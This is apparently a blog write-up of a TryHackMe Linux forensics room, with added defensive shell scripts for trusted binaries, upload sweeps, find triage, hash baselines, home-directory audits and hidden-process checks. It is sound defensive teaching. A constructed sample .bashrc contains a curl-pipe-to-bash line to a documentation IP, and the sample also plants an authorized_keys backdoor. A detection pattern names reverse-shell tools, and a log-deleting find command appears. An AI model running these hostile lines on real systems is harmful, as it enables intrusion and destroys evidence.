From Logs to Rootkits: A Complete Linux Forensic Analysis Breakdown
Devansh Patel
March 22, 2026 (Updated: March 22, 2026)
Just completed this amazing and very technically informative room, TryHackMe's "Linux File System Analysis", and found it very helpful because it taught me a lot of commands I didn't know earlier, so I thought I'd share it and break down the concepts in easy and understandable language.
Live Forensic File System Analysis → examining the file system of a running system, in its live environment, in order to identify evidence of a security breach.
The purpose of this file system analysis is to check account and login logs, file and directory ownership and permissions, the running processes, and the system configuration files.
It supports incident response by establishing when the incident occurred, how the attacker got into the system, what happened, how the system was affected, what changes were made, and what traces were left behind.
Forensic investigators do not rush to fix the system during incident response: the system is compromised and cannot be trusted, the attacker may still be inside it, malware may remain undetected, and a hasty fix can destroy evidence.
Instead, during incident response we isolate the system, disconnect its external communications, collect and preserve the evidence, document the findings, and only then patch the vulnerabilities that were exploited.
Note also that the Windows and Linux file systems differ in several ways.
Windows v/s Linux
Mounting the File System Before the Analysis
During a breach the attacker may have tampered with the system's binaries so that commands such as pwd, ps, ssh, ls, cat and many others return falsified results (this is exactly what a user-land rootkit does).
So we need known-good binaries. One way is to carry a toolkit of trusted, preferably statically linked, binaries on a USB drive, mount it read-only, and point PATH and LD_LIBRARY_PATH at it, so that the shell resolves commands and shared libraries from the toolkit instead of from the suspect system. Keep in mind that a kernel-level rootkit can still lie to a trusted user-space binary; this step only removes the user-space part of the problem.
export PATH=/mnt/usb/bin:/mnt/usb/sbin
export LD_LIBRARY_PATH=/mnt/usb/lib:/mnt/usb/lib64
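The two export lines only work if the shell actually picks the toolkit copies up. The following is an added example, not code from the room or the article: it wraps the same PATH and LD_LIBRARY_PATH change in a function and then verifies, with the shell's own builtin `command -v`, that each command you are about to rely on resolves to a path under the toolkit mount rather than to the suspect host's copy. The mount point /mnt/usb and the list of commands are assumptions; the read-only mount command in the comment is the usual way to attach the drive.

```shell
#!/bin/sh
# Added example (not from the room or the article): switch the shell to a
# trusted toolkit and verify that commands really resolve there.
# TOOLKIT is an assumed mount point for a read-only USB of known-good binaries.

TOOLKIT="${TOOLKIT:-/mnt/usb}"

# Point PATH and LD_LIBRARY_PATH exclusively at the toolkit mount ($1).
use_trusted_tools() {
    PATH="$1/bin:$1/sbin"
    LD_LIBRARY_PATH="$1/lib:$1/lib64"
    export PATH LD_LIBRARY_PATH
}

# Succeed only if every named command resolves to a path under the mount ($1).
# A command that is missing, or that resolves to the suspect host's copy,
# is reported on stderr and makes the whole check fail. command -v is a
# shell builtin, so the check itself does not depend on any host binary.
check_resolves_under() {
    mnt="$1"; shift
    ok=0
    for cmd in "$@"; do
        if ! resolved=$(command -v "$cmd" 2>/dev/null); then
            echo "MISSING:   $cmd (not in toolkit)" >&2; ok=1; continue
        fi
        case "$resolved" in
            "$mnt"/*) echo "trusted:   $cmd -> $resolved" ;;
            *)        echo "UNTRUSTED: $cmd -> $resolved" >&2; ok=1 ;;
        esac
    done
    return $ok
}

# Typical use on the suspect host, once the USB is mounted read-only:
#   mount -o ro /dev/sdb1 /mnt/usb
#   use_trusted_tools "$TOOLKIT"
#   check_resolves_under "$TOOLKIT" ls ps netstat ss find stat cat \
#       || echo "do not trust this shell"
```

If any command reports UNTRUSTED or MISSING, stop and fix the toolkit before collecting evidence; a single forged `ls` or `ps` is enough to hide the attacker's files and processes from everything that follows.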
Reading File Permissions and Ownership
As the image above shows, a file's permission string has three parts: permissions for the owner, permissions for the group, and permissions for others, each a read (r), write (w) and execute (x) triplet.
We set the read, write and execute permissions for each of these three classes with the chmod command, passing the octal number that encodes the permissions we want (read = 4, write = 2, execute = 1, summed per class), as shown in the image below.
The image below shows how to change the permissions of any file on Linux with chmod.
To view hidden files and the permissions of files, use ls -alh, where -a displays all files in the directory including hidden ones (names starting with a dot), -l uses the long listing format, and -h displays human-readable file sizes.
Attackers often stage files in /tmp (the temporary files directory, writable by all users), /var/tmp (temporary files that persist across reboots, also world-writable) and /dev/shm (shared memory, also normally writable by all users).
Finding unusual scripts in /var/www/html/uploads in the case of a file upload vulnerability
We can use ls -alh to list the files and pipe the output to grep -v "jpeg", which drops the lines containing jpeg so that only the non-jpeg files remain. This name-based filter is only a quick first look: a file named shell.jpeg.phtml would also be dropped, and a PHP file renamed to .jpeg would never show up, so confirm the file type by its contents rather than its name.
As the image above shows, this reveals a .phtml file containing a dangerous PHP script that executes system commands, which could expose sensitive information and allow directory traversal.
The script is explained in the image below.
It reads a command from a request parameter, executes that command, and returns the command's output in the response.
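Because an upload directory is exactly where an attacker controls file names, a content-based sweep is the check worth keeping. The following is an added example, not code from the room or the article: it classifies each file by its magic bytes (JPEG, PNG, GIF or not an image), flags names with more than one extension, and looks for a PHP open tag inside the file regardless of what the name says, so both a renamed webshell and a JPEG/PHP polyglot are reported. It uses only od, find and grep; the directory path is an argument, and the /var/www/html/uploads path from the room is the usual target.

```shell
#!/bin/sh
# Added example (not from the room or the article): sweep an upload directory
# for files that are not really images. Unlike "ls | grep -v jpeg", this checks
# the content (magic bytes) and the name independently, so x.jpeg.phtml and a
# PHP file renamed to .jpg are both reported.

# Print the first four bytes of a file as lowercase hex, e.g. "ffd8ffe0".
magic4() {
    od -An -tx1 -N4 "$1" 2>/dev/null | tr -d ' \n'
}

# Classify one file as an image type by its header, or "notimage".
image_type() {
    case "$(magic4 "$1")" in
        ffd8ff*)  echo jpeg ;;
        89504e47) echo png ;;
        47494638) echo gif ;;
        *)        echo notimage ;;
    esac
}

# Report every regular file under $1 that is suspicious:
#   CONTENT     the bytes are not an image at all
#   DOUBLE-EXT  the name has more than one extension, e.g. a.jpeg.phtml
#   PHP-TAG     the file contains a PHP open tag, even if it starts like an image
# Output lines: <reason> <path>
sweep_uploads() {
    find "$1" -type f 2>/dev/null | while IFS= read -r f; do
        base=${f##*/}
        t=$(image_type "$f")
        [ "$t" = notimage ] && echo "CONTENT    $f"
        case "$base" in *.*.*) echo "DOUBLE-EXT $f" ;; esac
        if grep -q '<?php' "$f" 2>/dev/null || grep -q '<?=' "$f" 2>/dev/null; then
            echo "PHP-TAG    $f"
        fi
    done
}

# Usage on the suspect host: sweep_uploads /var/www/html/uploads
```

A file that is a valid image but also carries a PHP tag is the polyglot case; whether it is dangerous depends on whether the web server will ever execute it (a .phtml or .php suffix, or a permissive handler), which is why the name checks are kept alongside the content check.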
Important Use Cases of the Find Command
find / -perm 777 -type f -executable 2>/dev/null :- finds regular files whose mode is exactly 777 (read, write and execute for owner, group and others) and that are executable, starting from the root of the file system (/); use . instead of / to start from the current directory. 2>/dev/null discards the permission-denied errors so the output stays clean. Note that -perm 777 is an exact match and misses, for example, a 775 or a 4777 file; -perm -0002 (any file with the world-writable bit set) is the broader check.
find / -name "*.log" -exec rm {} \; :- -exec runs a command on every file found; here it finds all .log files and deletes them. This illustrates the -exec syntax (and is exactly what an attacker covering their tracks would run); never run it on a system under investigation, because it destroys evidence. During triage use a read-only action instead, such as -exec ls -l {} \; or -ls.
find / -atime -1, find / -ctime -1, find / -mtime -1 :- three separate commands (not a pipeline). atime is when the file was last accessed (read or opened), ctime is when the file's metadata last changed (permissions, ownership, inode), and mtime is when the file's content was last modified; -1 means within the last 24 hours. For a finer window use -amin, -cmin and -mmin with a number of minutes.
find / -type f -name ".*" -executable 2>/dev/null :- finds all hidden executable files on the system.
Find Command Properly Explained
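The four find commands above are the building blocks of a triage sweep. The following is an added example, not code from the room or the article: it combines them into one non-destructive function that only reports, widens the 777 check to any world-writable file, adds the setuid/setgid and staging-directory checks that the earlier sections motivate, and uses a minute-granularity window so it can be re-run during an incident. It assumes GNU find (for -xdev, -executable, -mmin and -cmin); the root directory and window are arguments.

```shell
#!/bin/sh
# Added example (not from the room or the article): the find checks from this
# section, combined into one non-destructive triage sweep that only reports.
# $1 is the directory to start from (/ on the suspect host), $2 the recency
# window in minutes. -xdev keeps find on one file system, so /proc, /sys and
# network mounts are skipped; run it once per mounted file system of interest.

triage_find() {
    root="$1"; minutes="${2:-1440}"      # default window: 24 hours

    echo "== world-writable regular files (any mode with the o+w bit, not just 777)"
    find "$root" -xdev -type f -perm -0002 2>/dev/null

    echo "== world-writable executables"
    find "$root" -xdev -type f -perm -0002 -executable 2>/dev/null

    echo "== setuid / setgid files (escalation candidates; compare with a baseline)"
    find "$root" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null

    echo "== hidden executables"
    find "$root" -xdev -type f -name '.*' -executable 2>/dev/null

    echo "== content modified or metadata changed in the last $minutes minutes"
    find "$root" -xdev -type f \( -mmin "-$minutes" -o -cmin "-$minutes" \) 2>/dev/null

    echo "== executables in world-writable staging directories"
    for d in "$root/tmp" "$root/var/tmp" "$root/dev/shm"; do
        [ -d "$d" ] && find "$d" -xdev -type f -executable 2>/dev/null
    done
    return 0
}

# Usage on the suspect host, writing the report to the evidence drive:
#   triage_find / 60 > /mnt/usb/evidence/find-triage.txt
```

Write the report to the evidence drive, not to the suspect disk, and treat a hit in more than one section (a recently changed, hidden, world-writable executable in /dev/shm) as the thing to look at first.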
Reading the Metadata
Metadata is information about a file rather than its content: what the file system records (ownership, permissions, inode number, creation, access and modification times) and what many file formats embed in the file itself (author, creating tool, camera or device, coordinates).
One great tool for the embedded kind is exiftool, a Perl-based command-line utility with extensive capabilities for extracting and altering metadata from files by parsing their headers and embedded metadata structures.
Analyzing the Checksums
Checksums are fixed-length digests computed from a file's contents by a cryptographic hash function, using tools such as md5sum or sha256sum. They are deterministic, not random: the same content always produces the same digest, while even a one-bit change in the file produces a completely different digest, which is what lets us verify integrity against a known-good baseline. Prefer SHA-256; MD5 is collision-prone and only suitable for matching against existing MD5 references.
Viewing the Timestamps
ls -ul :- view the access time (atime) of files.
ls -cl :- view the change time (ctime) of files.
ls -l :- view the modify time (mtime) of files.
stat command :- displays all of a file's or directory's metadata, including all three timestamps (and the birth time where the file system records it). Two caveats: most systems mount with relatime, so atime is only updated in limited cases; and while an attacker can forge atime and mtime with touch, ctime cannot be set from user space (every touch bumps it to the current time), so a file whose mtime is far older than its ctime is a sign of timestomping.
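The checksum and timestamp sections both come down to comparing the current state of a tree against something trustworthy. The following is an added example, not code from the room or the article, that does both: it records a SHA-256 baseline of every regular file and later reports which files changed, disappeared or appeared, using sha256sum's own -c mode; and it lists files whose ctime is later than their mtime by more than a threshold, which is the timestomping indicator described above. It assumes GNU coreutils and findutils (sha256sum -c --quiet, stat -c, find -print0, xargs -0 -r); the baseline file path must be absolute and should live on the evidence drive, outside the tree being checked.

```shell
#!/bin/sh
# Added example (not from the room or the article): two integrity checks over
# a directory tree.
#  1. hash_baseline / hash_verify: record SHA-256 sums of every regular file
#     and later report changed, missing and new files.
#  2. find_timestomped: list files whose ctime is later than their mtime by
#     more than a threshold. touch can backdate atime/mtime, but every touch
#     sets ctime to "now" and ctime cannot be set from user space, so a large
#     mtime-before-ctime gap means the mtime was forged (or the file was
#     chmod/chown'ed after its last write, which is worth a look anyway).

# $1 = tree to hash, $2 = absolute path of the baseline file to write.
hash_baseline() {
    ( cd "$1" && find . -type f -print0 | LC_ALL=C sort -z | xargs -0 -r sha256sum ) > "$2"
}

# $1 = tree, $2 = absolute path of the baseline file.
# Prints sha256sum's per-file verdicts for changed and missing files, then
# "NEW: <path>" for files absent from the baseline. Returns 0 only if the
# tree matches the baseline exactly.
hash_verify() {
    rc=0
    ( cd "$1" && sha256sum -c --quiet "$2" 2>&1 ) || rc=1
    now=$(mktemp); known=$(mktemp)
    ( cd "$1" && find . -type f ) | LC_ALL=C sort > "$now"
    cut -d' ' -f3- "$2" | LC_ALL=C sort > "$known"      # "hash  ./path" -> "./path"
    new=$(comm -23 "$now" "$known")
    rm -f "$now" "$known"
    if [ -n "$new" ]; then echo "$new" | sed 's/^/NEW: /'; rc=1; fi
    return $rc
}

# $1 = tree, $2 = minimum ctime-minus-mtime gap in seconds (default 0).
# Prints "<mtime> <ctime> <path>" for each file over the gap. Uses GNU stat.
find_timestomped() {
    gap=${2:-0}
    find "$1" -type f -exec stat -c '%Y %Z %n' {} + 2>/dev/null |
        awk -v gap="$gap" '$2 - $1 > gap { print }'
}

# Usage: hash_baseline /etc /mnt/usb/evidence/etc.sha256   (on a known-good host)
#        hash_verify   /etc /mnt/usb/evidence/etc.sha256   (on the suspect host)
#        find_timestomped /usr/bin 3600
```

A baseline taken from the suspect host after the fact only proves that nothing changed between two of your own visits; the useful baseline comes from a clean install, a golden image, or the package manager's own records (see debsums below).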
Identifying Usernames, Passwords and Groups
/etc/passwd :- the most important file listing every user account with its UID, GID, home directory and login shell. The password field normally holds an x, meaning the actual hash lives in /etc/shadow. [Note :- any account with UID 0 has full root privileges, whatever its name; a second UID 0 account is a classic backdoor.]
/etc/passwd syntax
The image above shows the format of /etc/passwd: seven colon-separated fields, name:password:UID:GID:GECOS:home:shell.
/etc/shadow :- contains each user's password hash together with password-aging fields, and is readable only by root. An empty hash field means the account has no password at all; ! or * means the account is locked.
/etc/group :- contains the group names with their (usually unused) group password field, GID and the list of member usernames.
getent group [Group Name] :- lists the members of a particular group.
groups [Name of the user] :- lists the groups a user belongs to.
/etc/sudoers :- the most important file controlling who can run commands as another user via sudo. Also check the drop-in files under /etc/sudoers.d/, and read the effective policy with sudo -l or validate the file with visudo -c rather than opening it in an editor.
If a user's entry reads ALL=(ALL:ALL) ALL, that user can run any command as any user and any group with sudo. Look as well for NOPASSWD entries, which grant that without prompting for a password, and for group entries (lines starting with %) that pull in members of groups like sudo or wheel.
Debian Package Integrity Check
debsums command :- checks the integrity of the files installed by Debian packages against the MD5 sums that dpkg recorded at install time (/var/lib/dpkg/info/*.md5sums). debsums -c lists only the changed files, and debsums -a also checks configuration files, which are skipped by default. Caveat: a root-level attacker can rewrite those recorded sums along with the binaries, so a clean debsums run is one signal, not proof; the stronger comparison is against the original .deb from a mirror.
Hidden Files in the Home Directory
.ssh :- the very important ssh directory containing the user's ssh configuration (config, known_hosts), their keys, and authorized_keys; an attacker who appends a public key to authorized_keys gains persistent, password-less access.
.bashrc :- a very important hidden file that runs every time the user opens an interactive bash shell (not at system boot); an attacker can append commands to it so that malicious code executes whenever the user logs in.
.bash_history :- the history of the commands the user has run in the past. Attackers often clear it, symlink it to /dev/null, or unset HISTFILE, so an empty or suspiciously short history is itself a finding.
.profile :- the file that runs when the user logs in (for login shells); it is another persistence location for the same reason as .bashrc.
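The following is an added example, not code from the room or the article: an audit of the hidden files listed above for a single home directory. It greps the shell start-up files for lines that download, decode or execute something or open a reverse shell, lists every key in authorized_keys with its type, comment and any from=/command= options, and reports the common signs of history tampering (missing, empty or symlinked .bash_history, HISTFILE disabled). The patterns are a starting point rather than a complete signature set, and write_sample_home builds a constructed home directory (documentation-range IP addresses, placeholder key material) so the functions can be exercised offline.

```shell
#!/bin/sh
# Added example (not from the room or the article): audit the hidden files in
# one home directory. Usage on a live host: suspicious_rc_lines /home/alice;
# list_authorized_keys /home/alice; history_tampering /home/alice.

# Shell start-up files an attacker can use for persistence.
RC_FILES=".bashrc .profile .bash_profile .bash_login .zshrc"

# Lines in start-up files that fetch or run something, decode payloads, or
# open reverse shells. Output: "<file>:<line-number>:<line>".
suspicious_rc_lines() {     # $1 = home directory
    for f in $RC_FILES; do
        [ -f "$1/$f" ] || continue
        grep -nE '(^|[[:space:];|&(])(curl|wget|nc|ncat) |base64 -d|/dev/tcp/|python[23]? -c|bash -i' \
            "$1/$f" | sed "s|^|$f:|"
    done
    return 0
}

# One line per key in authorized_keys: type, comment and any leading options
# (from=, command=). Any key you cannot account for is persistent access.
list_authorized_keys() {    # $1 = home directory
    f="$1/.ssh/authorized_keys"
    [ -f "$f" ] || return 0
    grep -v '^[[:space:]]*#' "$f" | awk 'NF {
        iskey = ($1 ~ /^(ssh-|ecdsa-|sk-)/)
        print NR ": type=" (iskey ? $1 : $2) " comment=" $NF " options=" (iskey ? "-" : $1)
    }'
}

# Signs that the command history has been tampered with.
history_tampering() {       # $1 = home directory
    h="$1/.bash_history"
    if [ -L "$h" ]; then echo "HISTORY: symlink to $(readlink "$h")"
    elif [ ! -e "$h" ]; then echo "HISTORY: missing"
    elif [ ! -s "$h" ]; then echo "HISTORY: empty"
    fi
    for f in $RC_FILES; do
        [ -f "$1/$f" ] && grep -nE 'HISTFILE=|HISTSIZE=0|unset HISTFILE|set \+o history' \
            "$1/$f" | sed "s|^|HISTORY: $f:|"
    done
    return 0
}

# Constructed sample home directory (made up for this example) built in $1.
write_sample_home() {
    mkdir -p "$1/.ssh"
    cat > "$1/.bashrc" <<'EOF'
# ~/.bashrc
alias ll='ls -alF'
export PATH="$HOME/bin:$PATH"
(curl -s http://203.0.113.9/p.sh | bash -i) >/dev/null 2>&1 &
unset HISTFILE
EOF
    printf 'umask 022\n' > "$1/.profile"
    cat > "$1/.ssh/authorized_keys" <<'EOF'
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPlaceholderKeyMaterialOnly alice@laptop
command="/bin/sh",from="198.51.100.7" ssh-rsa AAAAB3NzaC1yc2EPlaceholderKeyMaterialOnly root@c2
EOF
    ln -s /dev/null "$1/.bash_history"
}
```

Run it for every home directory in /etc/passwd, including /root and the service accounts that should not have one, and compare authorized_keys against the keys the owner actually uses; a key with a command= option that drops the user into a shell is the giveaway in the sample.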
Checking the Login History
last :- lists the login history read from /var/log/wtmp (last -F shows full dates and times, last -i shows IP addresses instead of hostnames, and last -f reads another wtmp file, such as one copied from an evidence image).
lastb :- lists failed login attempts from /var/log/btmp (requires root).
lastlog :- shows the most recent login of every user, from /var/log/lastlog.
who :- shows the users currently logged in (w adds what each session is doing). All of these are binary files that a root-level attacker can edit or truncate, so cross-check them against the text logs (/var/log/auth.log or /var/log/secure) and journalctl.
Rootkits
Rootkits :- a rootkit is a type of malicious software designed to gain and maintain unauthorized (root/admin) access to a system while hiding its presence.
Chkrootkit [Check Rootkit] :- a simple tool that looks for the signs of known rootkits: it checks system binaries for modification, looks for rootkit signatures and known file names, and compares the process list from ps with the entries in /proc to spot hidden processes. Some rootkits are not detectable by it.
Rkhunter [Rootkit Hunter] :- a more advanced rootkit hunter (rkhunter --check runs the scan; rkhunter --propupd records a file-property baseline, which should be done right after a trusted install, not on a suspect host). Both tools are signature-based and should be run from trusted binaries; a kernel-level rootkit can still feed them false information.
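The hidden-process comparison that chkrootkit performs is simple enough to do by hand, which matters when you cannot install tools on the suspect host. The following is an added example, not code from the room or the article, and not chkrootkit's own code: it lists /proc with a shell glob (no external binary involved), takes the process list from ps, and reports every PID that is still present in /proc but absent from ps, re-checking each candidate so that processes that merely exited between the two snapshots are not reported. It assumes a Linux /proc and a ps that accepts -e -o pid= (with a fallback to ps ax); run it with ps from the trusted toolkit, and note that a kernel rootkit that filters /proc itself will defeat this check too.

```shell
#!/bin/sh
# Added example (not from the room or the article): the "hidden process" test
# that chkrootkit's chkproc performs, in plain shell. A user-land rootkit that
# hooks ps (or readdir in libc) usually still leaves /proc/<pid> reachable,
# and the shell's own glob over /proc does not go through the ps binary.

# Print PIDs present in /proc that ps did not report. Re-checks each
# candidate so processes that exited between the two snapshots are dropped.
hidden_pids() {
    command -v ps >/dev/null 2>&1 || { echo "ps not available" >&2; return 2; }
    proc_pids=""
    for d in /proc/[0-9]*; do proc_pids="$proc_pids ${d#/proc/}"; done
    ps_out=$(ps -e -o pid= 2>/dev/null) || ps_out=$(ps ax 2>/dev/null | awk 'NR > 1 { print $1 }')
    ps_pids=" $(printf '%s\n' "$ps_out" | tr -s ' \n' '  ') "
    for p in $proc_pids; do
        case "$ps_pids" in
            *" $p "*) ;;                            # reported by ps
            *) [ -d "/proc/$p" ] && echo "$p" ;;    # still alive, not in ps
        esac
    done
    return 0
}

# Describe a PID straight from /proc: "<pid> <name> <cmdline>".
describe_pid() {
    [ -r "/proc/$1/status" ] || return 1
    name=$(awk '/^Name:/ { print $2 }' "/proc/$1/status")
    cmd=$(tr '\0' ' ' < "/proc/$1/cmdline")
    echo "$1 $name ${cmd:-[kernel thread]}"
}

# Usage: for p in $(hidden_pids); do describe_pid "$p"; done
```

For any PID that comes back, /proc/<pid>/exe (a symlink, possibly to a deleted file), /proc/<pid>/cwd and /proc/<pid>/maps tell you what is running and from where, without relying on ls, lsof or the suspect libc's directory listing.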
Final Takeaway
Attackers don't break systems loudly.
They hide inside them.
Inside permissions.
Inside logs.
Inside hidden files.
Inside user accounts and sudo privileges.
And most importantly… inside the details you ignore.
Linux File System Analysis is not about running commands.
It is about connecting small clues into a complete story.
A strange permission.
A modified timestamp.
A hidden executable.
A suspicious login.
Individually, they mean nothing.
Together, they reveal everything.
Real security is not just detecting attacks.
It is understanding:
what happened, how it happened, and what was left behind.
If you can read the filesystem properly,
you don't just see files —
You see evidence.
Happy Hacking.
#cybersecurity #linux #linux-tutorial #hacking #bug-bounty